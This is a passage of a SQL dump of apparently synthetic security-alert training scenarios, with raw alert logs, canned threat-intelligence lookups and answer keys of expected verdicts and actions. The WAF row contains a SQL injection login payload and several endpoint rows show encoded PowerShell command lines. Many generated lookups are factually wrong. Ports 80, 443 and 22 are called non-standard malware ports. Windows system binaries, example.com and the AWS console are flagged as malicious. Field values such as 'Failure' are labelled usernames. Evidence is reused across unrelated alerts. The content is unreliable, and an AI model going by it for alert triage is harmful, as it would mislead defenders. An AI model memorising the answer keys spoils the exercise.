Abuse confidence score: 97%.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":null,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":null,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"51/72 security vendors identified this file as malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"powershell.exe\",\"is_critical\":null,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"File exhibits behavior consistent with malware: persistence mechanisms, network callbacks, code injection.\"}},{\"id\":\"artifact_6\",\"type\":\"filename\",\"value\":\"explorer.exe\",\"is_critical\":null,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"File exhibits behavior consistent with malware: persistence mechanisms, network callbacks, code injection.\"}},{\"id\":\"artifact_7\",\"type\":\"port\",\"value\":\"80\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"suspicious\",\"details\":\"Non-standard port 80 commonly used by malware for C2 communication.\"}},{\"id\":\"artifact_8\",\"type\":\"port\",\"value\":\"443\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"suspicious\",\"details\":\"Non-standard port 443 commonly used by malware for C2 communication.\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"High/Critical severity level; Alert type indicates malware/C2 activity; Alert type indicates suspicious script execution\"}', 'Intermediate', 'EDR', 1, 0, 'OT_ICS', NULL, NULL, 
'{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(225, 'Unauthorized Remote Access Attempt', 'high', 'network', 'Detected repeated login attempts from a suspicious IP address, potentially indicating a brute force attack.', 'Unauthorized Access', 'T1110', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-25T10:32:17Z\",\"event_type\":\"network\",\"src_ip\":\"203.0.113.45\",\"src_port\":44832,\"dest_ip\":\"192.168.1.10\",\"dest_port\":22,\"protocol\":\"TCP\",\"user_agent\":\"SSH-2.0-OpenSSH_7.6\",\"message\":\"Failed password for invalid user admin from 203.0.113.45 port 44832 ssh2\",\"attempt_count\":15,\"data_transferred_bytes\":524}', '2025-12-25 05:54:43', '2026-02-01 20:32:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 203.0.113.45 reported 216 times for malicious activity. Abuse confidence score: 81%.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"internal\",\"details\":\"192.168.1.10 is a private/internal IP address (RFC 1918). This is an internal network address and cannot be looked up in external threat intelligence. 
Investigate internal logs for activity from this host.\"}},{\"id\":\"artifact_3\",\"type\":\"port\",\"value\":\"44832\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"suspicious\",\"details\":\"Non-standard port 44832 commonly used by malware for C2 communication.\"}},{\"id\":\"artifact_4\",\"type\":\"port\",\"value\":\"22\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"suspicious\",\"details\":\"Non-standard port 22 commonly used by malware for C2 communication.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"High/Critical severity level; 15 failed login attempts detected\"}', 'Intermediate', 'NDR', 1, 0, 'FINANCE', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(226, 'Unauthorized Access Attempt Detected', 'high', 'network', 'Multiple failed login attempts were detected from a foreign IP address, potentially indicating a brute force attack targeting the SSH service.', 'Unauthorized Access', 'T1110 - Brute Force', 1, 'investigating', 96, '{\"timestamp\":\"2023-10-29T02:41:27Z\",\"event_type\":\"authentication_failed\",\"service\":\"SSH\",\"src_ip\":\"203.0.113.45\",\"dest_ip\":\"192.168.1.10\",\"username_attempts\":[\"admin\",\"root\",\"testuser\"],\"failed_attempts_count\":15,\"alert_threshold_exceeded\":true,\"geo_location\":\"New Zealand\",\"session_id\":\"9H4F5J2K3M\",\"network_info\":{\"src_port\":58764,\"dest_port\":22,\"protocol\":\"TCP\"}}', '2025-12-25 05:07:28', '2026-02-01 20:32:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 203.0.113.45 reported 322 times for malicious activity. Abuse confidence score: 87%.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"internal\",\"details\":\"192.168.1.10 is a private/internal IP address (RFC 1918). This is an internal network address and cannot be looked up in external threat intelligence. 
Investigate internal logs for activity from this host.\"}},{\"id\":\"artifact_3\",\"type\":\"geolocation\",\"value\":\"New Zealand\",\"is_critical\":false,\"osint_result\":{\"source\":\"GeoIP Lookup\",\"verdict\":\"suspicious\",\"details\":\"Login from New Zealand - unusual location for this user\'s typical access pattern.\"}},{\"id\":\"artifact_4\",\"type\":\"port\",\"value\":\"58764\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"suspicious\",\"details\":\"Non-standard port 58764 commonly used by malware for C2 communication.\"}},{\"id\":\"artifact_5\",\"type\":\"port\",\"value\":\"22\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"suspicious\",\"details\":\"Non-standard port 22 commonly used by malware for C2 communication.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"High/Critical severity level; 15 failed login attempts detected\"}', 'Intermediate', 'SIEM', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(227, 'Unauthorized AWS Access Attempt Detected', 'high', 'AWS CloudTrail', 'An unauthorized login attempt was detected in AWS account using an anomalous IP address. IP address associated with known threat actor activities. This matches the MITRE ATT&CK technique for Valid Accounts (T1078).', 'Unauthorized Access', 'T1078', 1, 'Closed', 95, '{\"eventVersion\":\"1.08\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"AIDAEXAMPLEUSER\",\"arn\":\"arn:aws:iam::123456789012:user/example_user\",\"accountId\":\"123456789012\",\"accessKeyId\":\"EXAMPLEKEYID\",\"userName\":\"example_user\"},\"eventTime\":\"2023-10-12T14:55:55Z\",\"eventSource\":\"signin.amazonaws.com\",\"eventName\":\"ConsoleLogin\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"192.0.2.99\",\"userAgent\":\"Mozilla/5.0\",\"errorMessage\":\"Failed authentication\",\"requestParameters\":null,\"responseElements\":{\"ConsoleLogin\":\"Failure\"},\"additionalEventData\":{\"LoginTo\":\"https://console.aws.amazon.com/\",\"MobileVersion\":\"No\",\"MFAUsed\":\"No\"},\"eventID\":\"abcd1234-5678-90ab-cdef-EXAMPLE123456\",\"readOnly\":false,\"eventType\":\"AwsConsoleSignIn\",\"recipientAccountId\":\"123456789012\"}', '2025-12-25 05:00:07', '2026-02-01 20:32:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 192.0.2.99 reported 479 times for malicious activity. 
Abuse confidence score: 84%.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"123456789012\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"example_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"Failure\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_5\",\"type\":\"geolocation\",\"value\":\"us-east-1\",\"is_critical\":false,\"osint_result\":{\"source\":\"GeoIP Lookup\",\"verdict\":\"suspicious\",\"details\":\"Login from us-east-1 - unusual location for this user\'s typical access pattern.\"}},{\"id\":\"artifact_6\",\"type\":\"url\",\"value\":\"https://console.aws.amazon.com/\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan.io\",\"verdict\":\"malicious\",\"details\":\"URL hosts credential harvesting page mimicking legitimate login portal.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"unknown\",\"analysis_notes\":\"High/Critical severity level\"}', 'Intermediate', 'SIEM', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.822Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.08\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"IAMUser\\\",\\\"principalId\\\":\\\"AIDAEXAMPLEUSER\\\",\\\"arn\\\":\\\"arn:aws:iam::123456789012:user/example_user\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"accessKeyId\\\":\\\"EXAMPLEKEYID\\\",\\\"userName\\\":\\\"example_user\\\"},\\\"eventTime\\\":\\\"2023-10-12T14:55:55Z\\\",\\\"eventSource\\\":\\\"signin.amazonaws.com\\\",\\\"eventName\\\":\\\"ConsoleLogin\\\",\\\"awsRegion\\\":\\\"us-east-1\\\",\\\"sourceIPAddress\\\":\\\"192.0.2.99\\\",\\\"userAgent\\\":\\\"Mozilla/5.0\\\",\\\"errorMessage\\\":\\\"Failed authentication\\\",\\\"requestParameters\\\":null,\\\"responseElements\\\":{\\\"ConsoleLogin\\\":\\\"Failure\\\"},\\\"additionalEventData\\\":{\\\"LoginTo\\\":\\\"https://console.aws.amazon.com/\\\",\\\"MobileVersion\\\":\\\"No\\\",\\\"MFAUsed\\\":\\\"No\\\"},\\\"eventID\\\":\\\"abcd1234-5678-90ab-cdef-EXAMPLE123456\\\",\\\"readOnly\\\":false,\\\"eventType\\\":\\\"AwsConsoleSignIn\\\",\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.822Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.08\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"IAMUser\\\",\\\"principalId\\\":\\\"AIDAEXAMPLEUSER\\\",\\\"arn\\\":\\\"arn:aws:iam::123456789012:user/example_user\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"accessKeyId\\\":\\\"EXAMPLEKEYID\\\",\\\"userName\\\":\\\"example_user\\\"},\\\"eventTime\\\":\\\"2023-10-12T14:55:55Z\\\",\\\"eventSource\\\":\\\"signin.amazonaws.com\\\",\\\"eventName\\\":\\\"ConsoleLogin\\\",\\\"awsRegion\\\":\\\"us-east-1\\\",\\\"sourceIPAddress\\\":\\\"192.0.2.99\\\",\\\"userAgent\\\":\\\"Mozilla/5.0\\\",\\\"errorMessage\\\":\\\"Failed 
authentication\\\",\\\"requestParameters\\\":null,\\\"responseElements\\\":{\\\"ConsoleLogin\\\":\\\"Failure\\\"},\\\"additionalEventData\\\":{\\\"LoginTo\\\":\\\"https://console.aws.amazon.com/\\\",\\\"MobileVersion\\\":\\\"No\\\",\\\"MFAUsed\\\":\\\"No\\\"},\\\"eventID\\\":\\\"abcd1234-5678-90ab-cdef-EXAMPLE123456\\\",\\\"readOnly\\\":false,\\\"eventType\\\":\\\"AwsConsoleSignIn\\\",\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.822Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.08\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"IAMUser\\\",\\\"principalId\\\":\\\"AIDAEXAMPLEUSER\\\",\\\"arn\\\":\\\"arn:aws:iam::123456789012:user/example_user\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"accessKeyId\\\":\\\"EXAMPLEKEYID\\\",\\\"userName\\\":\\\"example_user\\\"},\\\"eventTime\\\":\\\"2023-10-12T14:55:55Z\\\",\\\"eventSource\\\":\\\"signin.amazonaws.com\\\",\\\"eventName\\\":\\\"ConsoleLogin\\\",\\\"awsRegion\\\":\\\"us-east-1\\\",\\\"sourceIPAddress\\\":\\\"192.0.2.99\\\",\\\"userAgent\\\":\\\"Mozilla/5.0\\\",\\\"errorMessage\\\":\\\"Failed authentication\\\",\\\"requestParameters\\\":null,\\\"responseElements\\\":{\\\"ConsoleLogin\\\":\\\"Failure\\\"},\\\"additionalEventData\\\":{\\\"LoginTo\\\":\\\"https://console.aws.amazon.com/\\\",\\\"MobileVersion\\\":\\\"No\\\",\\\"MFAUsed\\\":\\\"No\\\"},\\\"eventID\\\":\\\"abcd1234-5678-90ab-cdef-EXAMPLE123456\\\",\\\"readOnly\\\":false,\\\"eventType\\\":\\\"AwsConsoleSignIn\\\",\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.822Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.08\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"IAMUser\\\",\\\"principalId\\\":\\\"AIDAEXAMPLEUSER\\\",\\\"arn\\\":\\\"arn:aws:iam::123456789012:user/example_user\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"accessKeyId\\\":\\\"EXAMPLEKEYID\\\",\\\"userName\\\":\\\"example_user\\\"},\\\"eventTime\\\":\\\"2023-10-12T14:55:55Z\\\",\\\"eventSource\\\":\\\"signin.amazonaws.com\\\",\\\"eventName\\\":\\\"ConsoleLogin\\\",\\\"awsRegion\\\":\\\"us-east-1\\\",\\\"sourceIPAddress\\\":\\\"192.0.2.99\\\",\\\"userAgent\\\":\\\"Mozilla/5.0\\\",\\\"errorMessage\\\":\\\"Failed authentication\\\",\\\"requestParameters\\\":null,\\\"responseElements\\\":{\\\"ConsoleLogin\\\":\\\"Failure\\\"},\\\"additionalEventData\\\":{\\\"LoginTo\\\":\\\"https://console.aws.amazon.com/\\\",\\\"MobileVersion\\\":\\\"No\\\",\\\"MFAUsed\\\":\\\"No\\\"},\\\"eventID\\\":\\\"abcd1234-5678-90ab-cdef-EXAMPLE123456\\\",\\\"readOnly\\\":false,\\\"eventType\\\":\\\"AwsConsoleSignIn\\\",\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.822Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.08\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"IAMUser\\\",\\\"principalId\\\":\\\"AIDAEXAMPLEUSER\\\",\\\"arn\\\":\\\"arn:aws:iam::123456789012:user/example_user\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"accessKeyId\\\":\\\"EXAMPLEKEYID\\\",\\\"userName\\\":\\\"example_user\\\"},\\\"eventTime\\\":\\\"2023-10-12T14:55:55Z\\\",\\\"eventSource\\\":\\\"signin.amazonaws.com\\\",\\\"eventName\\\":\\\"ConsoleLogin\\\",\\\"awsRegion\\\":\\\"us-east-1\\\",\\\"sourceIPAddress\\\":\\\"192.0.2.99\\\",\\\"userAgent\\\":\\\"Mozilla/5.0\\\",\\\"errorMessage\\\":\\\"Failed 
authentication\\\",\\\"requestParameters\\\":null,\\\"responseElements\\\":{\\\"ConsoleLogin\\\":\\\"Failure\\\"},\\\"additionalEventData\\\":{\\\"LoginTo\\\":\\\"https://console.aws.amazon.com/\\\",\\\"MobileVersion\\\":\\\"No\\\",\\\"MFAUsed\\\":\\\"No\\\"},\\\"eventID\\\":\\\"abcd1234-5678-90ab-cdef-EXAMPLE123456\\\",\\\"readOnly\\\":false,\\\"eventType\\\":\\\"AwsConsoleSignIn\\\",\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(228, 'Unauthorized Access Attempt on Web Application', 'high', 'web_application_firewall', 'Detected multiple SQL injection attempts from a single IP address. The requests aimed at exploiting vulnerabilities in the login form.', 'intrusion_attempt', 'T1190: Exploit Public-Facing Application', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-24T14:35:23Z\",\"waf_id\":\"waf-01\",\"client_ip\":\"192.168.5.87\",\"request_method\":\"POST\",\"requested_url\":\"/login\",\"http_version\":\"HTTP/1.1\",\"alert_trigger\":\"SQL_Injection_Detect\",\"request_headers\":{\"Host\":\"example.com\",\"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"Accept\":\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\"},\"request_body\":\"username=admin\' OR \'1\'=\'1\' -- &password=pwd123\",\"rule_id\":\"981245\",\"rule_message\":\"Possible SQL injection attack detected\"}', '2025-12-25 05:55:11', '2026-02-01 20:32:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.5.87\",\"is_critical\":true,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"internal\",\"details\":\"192.168.5.87 is a private/internal IP address (RFC 1918). This is an internal network address and cannot be looked up in external threat intelligence. 
Investigate internal logs for activity from this host.\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"57/94 security vendors flagged this domain as malicious.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"unknown\",\"analysis_notes\":\"High/Critical severity level\"}', 'Intermediate', 'SIEM', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(229, 'Suspicious PowerShell Script Executed', 'high', 'endpoint', 'A PowerShell script was executed with potentially malicious behavior, indicating possible PowerShell exploitation tactics.', 'process', 'T1059.001', 1, 'Closed', 137, '{\"timestamp\":\"2023-10-25T14:22:11Z\",\"host\":\"DESKTOP-5GH7JAM\",\"user\":\"JohnDoe\",\"process_id\":4380,\"process_name\":\"powershell.exe\",\"cmdline\":\"powershell -NoP -NonI -W Hidden -Enc WnNvR... (encapsulated malicious command)\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"parent_process_id\":374,\"parent_process_name\":\"explorer.exe\",\"integrity_level\":\"Medium\",\"session_id\":2}', '2025-12-25 15:32:46', '2026-02-13 13:10:32', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"username\",\"value\":\"JohnDoe\",\"is_critical\":null,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":null,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"54/72 security vendors identified this file as malware.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"powershell.exe\",\"is_critical\":null,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"File exhibits behavior consistent with malware: persistence mechanisms, network callbacks, code injection.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"explorer.exe\",\"is_critical\":null,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"File exhibits behavior consistent with malware: persistence mechanisms, network callbacks, code 
injection.\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"High/Critical severity level; Alert type indicates malware/C2 activity; Alert type indicates suspicious script execution\"}', 'Intermediate', 'EDR', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(230, 'Suspicious Domain Name Resolution Detected', 'high', 'DNS Security', 'A DNS request was made to a domain known for distributing malware. This domain has been flagged in multiple threat intelligence databases.', 'Malware', 'T1071', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event_type\":\"dns_query\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"victim-machine\",\"domain\":\"maliciousdomain.com\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2025-12-25 21:24:21', '2026-02-18 13:54:30', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 352 times for hosting malware distribution sites.\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Domain linked to multiple malware campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The domain and associated IP have been confirmed malicious through OSINT. 
Blocking the IP and isolating the host will prevent further compromise.\"}', 'Intermediate', 'TI', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.826Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"victim-machine\\\",\\\"domain\\\":\\\"maliciousdomain.com\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.826Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"victim-machine\\\",\\\"domain\\\":\\\"maliciousdomain.com\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.826Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"victim-machine\\\",\\\"domain\\\":\\\"maliciousdomain.com\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.826Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
